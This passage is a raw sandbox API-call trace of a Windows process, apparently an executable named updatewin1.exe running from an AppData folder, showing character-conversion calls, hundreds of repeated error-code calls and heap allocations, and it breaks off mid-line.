cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86tc\x87\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.207] GetLastError () returned 0x0 [0079.208] SetLastError (dwErrCode=0x0) [0079.208] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0079.208] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ") returned 256 [0079.208] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0079.208] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ壉胩㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0079.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86tc\x87\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0079.208] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\updatewin1.exe")) returned 0x5f [0079.208] GetLastError () returned 0x0 [0079.208] SetLastError (dwErrCode=0x0) [0079.208] GetLastError () returned 0x0 [0079.209] SetLastError (dwErrCode=0x0) [0079.209] GetLastError () returned 0x0 [0079.209] SetLastError (dwErrCode=0x0) [0079.209] GetLastError () returned 0x0 [0079.209] SetLastError (dwErrCode=0x0) [0079.210] GetLastError () returned 0x0 [0079.210] SetLastError (dwErrCode=0x0) [0079.210] GetLastError () returned 0x0 [0079.210] SetLastError (dwErrCode=0x0) [0079.210] GetLastError () returned 0x0 [0079.210] SetLastError (dwErrCode=0x0) [0079.210] GetLastError () returned 0x0 [0079.210] SetLastError (dwErrCode=0x0) [0079.210] GetLastError () returned 0x0 [0079.211] SetLastError (dwErrCode=0x0) [0079.211] GetLastError () returned 0x0 [0079.211] SetLastError (dwErrCode=0x0) [0079.211] GetLastError () returned 0x0 [0079.211] SetLastError (dwErrCode=0x0) [0079.211] GetLastError () returned 0x0 [0079.212] SetLastError (dwErrCode=0x0) [0079.212] GetLastError () returned 0x0 [0079.212] SetLastError (dwErrCode=0x0) [0079.212] GetLastError () returned 0x0 [0079.212] SetLastError (dwErrCode=0x0) [0079.212] GetLastError () returned 0x0 [0079.212] SetLastError (dwErrCode=0x0) [0079.212] GetLastError () returned 0x0 [0079.213] SetLastError (dwErrCode=0x0) [0079.213] GetLastError () returned 0x0 [0079.213] SetLastError (dwErrCode=0x0) [0079.213] GetLastError () returned 0x0 [0079.213] SetLastError (dwErrCode=0x0) [0079.213] GetLastError () returned 0x0 [0079.213] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.214] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.214] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.214] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.214] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.214] SetLastError (dwErrCode=0x0) [0079.214] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.215] SetLastError (dwErrCode=0x0) [0079.215] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.216] SetLastError (dwErrCode=0x0) [0079.216] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.217] GetLastError () returned 0x0 [0079.217] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.218] SetLastError (dwErrCode=0x0) [0079.218] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.219] SetLastError (dwErrCode=0x0) [0079.219] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.220] SetLastError (dwErrCode=0x0) [0079.220] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.221] SetLastError (dwErrCode=0x0) [0079.221] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.222] SetLastError (dwErrCode=0x0) [0079.222] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x0, Size=0x68) returned 0x1d31990 [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.223] SetLastError (dwErrCode=0x0) [0079.223] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.224] SetLastError (dwErrCode=0x0) [0079.224] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.225] SetLastError (dwErrCode=0x0) [0079.225] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.226] GetLastError () returned 0x0 [0079.226] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.227] SetLastError (dwErrCode=0x0) [0079.227] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.228] GetLastError () returned 0x0 [0079.228] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.229] SetLastError (dwErrCode=0x0) [0079.229] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.230] SetLastError (dwErrCode=0x0) [0079.230] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.231] SetLastError (dwErrCode=0x0) [0079.231] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.232] SetLastError (dwErrCode=0x0) [0079.232] GetLastError () returned 0x0 [0079.233] SetLastError (dwErrCode=0x0) [0079.233] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.315] SetLastError (dwErrCode=0x0) [0079.315] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] GetLastError () returned 0x0 [0079.316] SetLastError (dwErrCode=0x0) [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x98) returned 0x1d31a00 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1f) returned 0x1d31aa0 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x36) returned 0x1d31ac8 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x37) returned 0x1d31b08 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x3c) returned 0x1d31b48 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x31) returned 0x1d31b90 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x17) returned 0x1d31bd0 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x24) returned 0x1d31bf0 [0079.316] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x14) returned 0x1d31c20 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0xd) returned 0x1d31c40 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x25) returned 0x1d31c58 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x39) returned 0x1d31c88 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x18) returned 0x1d31cd0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x17) returned 0x1d31cf0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0xe) returned 0x1d31d10 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x69) returned 0x1d31d28 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x3e) returned 0x1d31da0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1b) returned 0x1d31de8 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1d) returned 0x1d31e10 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x48) returned 0x1d31e38 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x12) returned 0x1d31e88 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x18) returned 0x1d31ea8 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1b) returned 0x1d31ec8 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x24) returned 0x1d31ef0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x29) returned 0x1d31f20 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x1e) returned 0x1d31f58 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x41) returned 0x1d31f80 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x17) returned 0x1d31fd0 [0079.317] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0xf) returned 